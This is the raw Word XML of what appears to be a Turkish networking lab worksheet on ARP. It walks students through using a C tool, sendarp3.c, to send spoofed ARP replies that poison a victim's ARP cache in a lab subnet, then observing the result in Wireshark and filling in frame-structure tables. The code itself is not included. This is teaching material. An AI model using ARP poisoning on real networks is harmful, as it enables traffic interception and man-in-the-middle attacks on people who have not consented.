          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[Buraya ARP</w:t>
      </w:r>
      <w:r w:rsidR="003504E8">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yanıtı(</w:t>
      </w:r>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reply</w:t>
      </w:r>
      <w:r w:rsidR="003504E8">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> için bir ekran görüntüsü ekleyin]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00511CE8" w:rsidRDefault="00511CE8" w:rsidP="00BC1A05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E55134" w:rsidRPr="0019516D" w:rsidRDefault="00E55134" w:rsidP="00E55134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19516D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ARP reply</w:t>
      </w:r>
      <w:r w:rsidR="00D80BAD">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(yanıt)</w:t>
      </w:r>
      <w:r w:rsidRPr="0019516D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ı</w:t>
      </w:r>
      <w:r w:rsidRPr="0019516D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: sendarp3.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (bkz.</w:t>
      </w:r>
      <w:r w:rsidRPr="0019516D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ek 2</w:t>
      </w:r>
      <w:r w:rsidRPr="0019516D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E55134" w:rsidRDefault="00E55134" w:rsidP="00E55134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E55134">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ek 2'de verilen C kodunu ARP sahtekarlığını gerçekleştirmek için bir araç olarak kullanacağız. Sendarp3 pro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gramı, saldırgandan ARP yanıtını</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55134">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ARP talebi olmadan kurbana (kaynağa) gönderir. </w:t>
      </w:r>
      <w:r w:rsidR="00D80BAD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Program, b</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55134">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ilgisayarın arayüz adını, saldırganın IP adresini, sahte MAC adresini, mağdurun IP adresini (kaynak), mağdurun MAC adresini (kaynak) ve ARP cevaplarının sayısını parametre olarak kullanır. Programın kullanımı aşağıdaki şekilden görülebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E55134" w:rsidRDefault="00E55134" w:rsidP="00E55134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14C0812D" wp14:editId="38284CBA">
            <wp:extent cx="5760720" cy="77130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s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134" w:rsidRDefault="00E55134" w:rsidP="00E55134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E55134" w:rsidRDefault="00E55134" w:rsidP="00E55134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E55134">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sendarp3 programını kullanmak için yukarıda belirtilen parametreleri bilmeliyiz. Arayüz adını, MAC adresini ve IP adresini görmek için </w:t>
      </w:r>
      <w:r w:rsidRPr="00E55134">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55134">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> komutu kullanılabilir. (Aşağıdaki şekle bakınız)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E55134" w:rsidRDefault="00E55134" w:rsidP="00E55134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr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 wp14:anchorId="7D1449F1" wp14:editId="0E65A29B">
            <wp:extent cx="5760720" cy="5363845"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="4" name="Resim 4" descr="ekran görüntüsü, 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fconfig_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134" w:rsidRDefault="00E55134" w:rsidP="00E55134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00511CE8" w:rsidRDefault="00E55134" w:rsidP="00511CE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E55134">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55134">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> komutunun örnek bir çıktısı yukarıdaki şekilden görülebilir. Arabirim adlarını (enp4s0f2 - kablolu, wlp3s0 - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kablosuz), IP adreslerini (inet</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55134">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 192.168.7.102) ve MAC adresini (et</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55134">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>er: 6c: 71: d9: 67: c0: af) gösterir. Örnek kablosuz arabirim kullanılarak hazırlandığından, “wlp3s0” arabirim adı olarak kullanılır ancak laboratuarda “e” ile başlayan kablolu arabirim adını kullanacağız.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E55134" w:rsidRDefault="00E55134" w:rsidP="00511CE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003020B3" w:rsidRPr="003504E8" w:rsidRDefault="003020B3" w:rsidP="003020B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003504E8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ARP sahtekarlığı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB7AAE" w:rsidRPr="00FB7AAE" w:rsidRDefault="00FB7AAE" w:rsidP="00FB7AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7AAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Şimdi Adım 7'de verilen komut satırını kullanarak, saldırgandan kay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nağa (mağdur) on adet ARP yanıtı</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7AAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> oluşturun.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB7AAE" w:rsidRDefault="00FB7AAE" w:rsidP="00FB7AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7AAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aşağıda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ki örnekte </w:t>
      </w:r>
      <w:r w:rsidR="008B6692">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> saldırgan 192.168.181.125’te</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7AAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">n, </w:t>
      </w:r>
      <w:r w:rsidR="008B6692">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">kurban </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.181.132’ye , </w:t>
      </w:r>
      <w:r w:rsidR="008B6692">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.181.126</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7AAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="008B6692">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nı</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7AAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n MAC ad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>resi</w:t>
      </w:r>
      <w:r w:rsidR="008B6692">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> zehirlenmesi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B6692">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>için gönderilen  10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> yanıt mesajı gösterilmiştir</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7AAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (program la</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unch</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7AAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ve Wireshark çıktısı):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB7AAE" w:rsidRDefault="00FB7AAE" w:rsidP="00FB7AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001D0B27" w:rsidRDefault="001D0B27" w:rsidP="003020B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001D0B27" w:rsidRDefault="009656B5" w:rsidP="001D0B27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06545A65" wp14:editId="6D1C97F9">
            <wp:extent cx="5760720" cy="3253330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ARP3_at_125_2404201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E8" w:rsidRDefault="00511CE8" w:rsidP="00BC1A05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00511CE8" w:rsidRDefault="00511CE8" w:rsidP="00511CE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291B1A">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="006210A0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Buraya g</w:t>
      </w:r>
      <w:r w:rsidR="003020B3" w:rsidRPr="003020B3">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">önderen </w:t>
      </w:r>
      <w:r w:rsidR="006210A0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">hostun </w:t>
      </w:r>
      <w:r w:rsidR="003020B3" w:rsidRPr="003020B3">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ARP Yanıt </w:t>
      </w:r>
      <w:r w:rsidR="006210A0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">gönder </w:t>
      </w:r>
      <w:r w:rsidR="003020B3" w:rsidRPr="003020B3">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">programı lansmanının ve Wireshark'ın </w:t>
      </w:r>
      <w:r w:rsidR="006210A0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>çıkışının ekran görüntüsü ekleyin</w:t>
      </w:r>
      <w:r w:rsidR="003020B3" w:rsidRPr="003020B3">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A46FC" w:rsidRPr="003A46FC" w:rsidRDefault="003A46FC" w:rsidP="00511CE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A46FC" w:rsidRDefault="003A46FC" w:rsidP="00511CE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC1A05" w:rsidRPr="00FB7AAE" w:rsidRDefault="003020B3" w:rsidP="00FB7AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003020B3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.181.132 </w:t>
      </w:r>
      <w:r w:rsidR="006210A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> üzerindeki</w:t>
      </w:r>
      <w:r w:rsidRPr="003020B3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r w:rsidR="006210A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yanıtları (</w:t>
      </w:r>
      <w:r w:rsidRPr="003020B3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ARP yanıtları </w:t>
      </w:r>
      <w:r w:rsidR="006210A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alınmadan önce</w:t>
      </w:r>
      <w:r w:rsidR="00FB7AAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ki</w:t>
      </w:r>
      <w:r w:rsidR="006210A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ve sonraki</w:t>
      </w:r>
      <w:r w:rsidR="00FB7AAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(ARP spoofingden önce ve sonra</w:t>
      </w:r>
      <w:r w:rsidR="006210A0" w:rsidRPr="00FB7AAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) ARP tablosu</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7AAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D0B27" w:rsidRDefault="009656B5" w:rsidP="00BC1A05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03E5D99E" wp14:editId="23DA2E4F">
            <wp:extent cx="5760720" cy="3253330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P_pois_rest_pois_2404201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CE8" w:rsidRDefault="00511CE8" w:rsidP="00511CE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291B1A">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="003020B3" w:rsidRPr="003020B3">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Alıcı </w:t>
      </w:r>
      <w:r w:rsidR="006210A0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hosttaki</w:t>
      </w:r>
      <w:r w:rsidR="003020B3" w:rsidRPr="003020B3">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ARP sahtekarlığından önce</w:t>
      </w:r>
      <w:r w:rsidR="006210A0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ki</w:t>
      </w:r>
      <w:r w:rsidR="003020B3" w:rsidRPr="003020B3">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ve sonra</w:t>
      </w:r>
      <w:r w:rsidR="006210A0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ki</w:t>
      </w:r>
      <w:r w:rsidR="003020B3" w:rsidRPr="003020B3">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wireshark çıktısının ve ARP tablosunun ekran görüntüsünü buraya yerleştirin]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00511CE8" w:rsidRPr="003A46FC" w:rsidRDefault="003020B3" w:rsidP="00BC1A05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003020B3">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Soru: ARP sahtekarlığı nasıl yapılır?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A46FC" w:rsidRPr="00BC1A05" w:rsidRDefault="003A46FC" w:rsidP="00BC1A05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00291B1A" w:rsidRDefault="00117641" w:rsidP="0011764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Wireshark'ta ARP istek</w:t>
      </w:r>
      <w:r w:rsidR="003020B3" w:rsidRPr="003020B3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ve ARP yanıt paketlerinin </w:t>
      </w:r>
      <w:r w:rsidR="006210A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ekran görüntülerini alın (</w:t>
      </w:r>
      <w:r w:rsidRPr="00117641">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark tarafından </w:t>
      </w:r>
      <w:r w:rsidR="003020B3" w:rsidRPr="003020B3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ARP isteği ve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">yanıt </w:t>
      </w:r>
      <w:r w:rsidR="003020B3" w:rsidRPr="003020B3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mesajları için gösterilen verilerden itibaren</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="003020B3" w:rsidRPr="003020B3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291B1A" w:rsidRDefault="00291B1A" w:rsidP="00291B1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291B1A">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="003020B3" w:rsidRPr="003020B3">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00117641">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">uraya ARP </w:t>
      </w:r>
      <w:r w:rsidR="008B6692">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Request (İstek) için</w:t>
      </w:r>
      <w:r w:rsidR="003020B3" w:rsidRPr="003020B3">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bir ekran görüntüsü ekleyin]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291B1A" w:rsidRPr="00291B1A" w:rsidRDefault="00291B1A" w:rsidP="00291B1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC1A05" w:rsidRPr="00291B1A" w:rsidRDefault="003020B3" w:rsidP="00291B1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003020B3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aşağıdaki yapıları kullanarak Ethernet çerçevesi ve ARP pak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">etinin tüm alanlarını doldurun. </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00591C9A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Ethernet_frame</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00591C9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ve</w:t>
      </w:r>
      <w:r w:rsidR="00591C9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00591C9A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Address_Resolution_Protocol</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00812FF9">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11199" w:type="dxa"/>
        <w:tblInd w:w="-103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"/>
        <w:gridCol w:w="857"/>
        <w:gridCol w:w="1068"/>
        <w:gridCol w:w="917"/>
        <w:gridCol w:w="928"/>
        <w:gridCol w:w="1196"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="998"/>
        <w:gridCol w:w="1188"/>
        <w:gridCol w:w="1216"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B17365" w:rsidTr="00B17365">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="1216" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="99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B17365" w:rsidRDefault="00B17365" w:rsidP="00161F8B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B17365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 xml:space="preserve">802.3 </w:t>
            </w:r>
            <w:r w:rsidR="00FB7AA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ARP isteği içeren</w:t>
            </w:r>
            <w:r w:rsidR="003020B3" w:rsidRPr="003020B3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 xml:space="preserve"> Ethernet çerçeve yapısı</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17365" w:rsidTr="00B17365">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="98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Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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Preamble</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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Start of frame delimiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="91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MAC destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
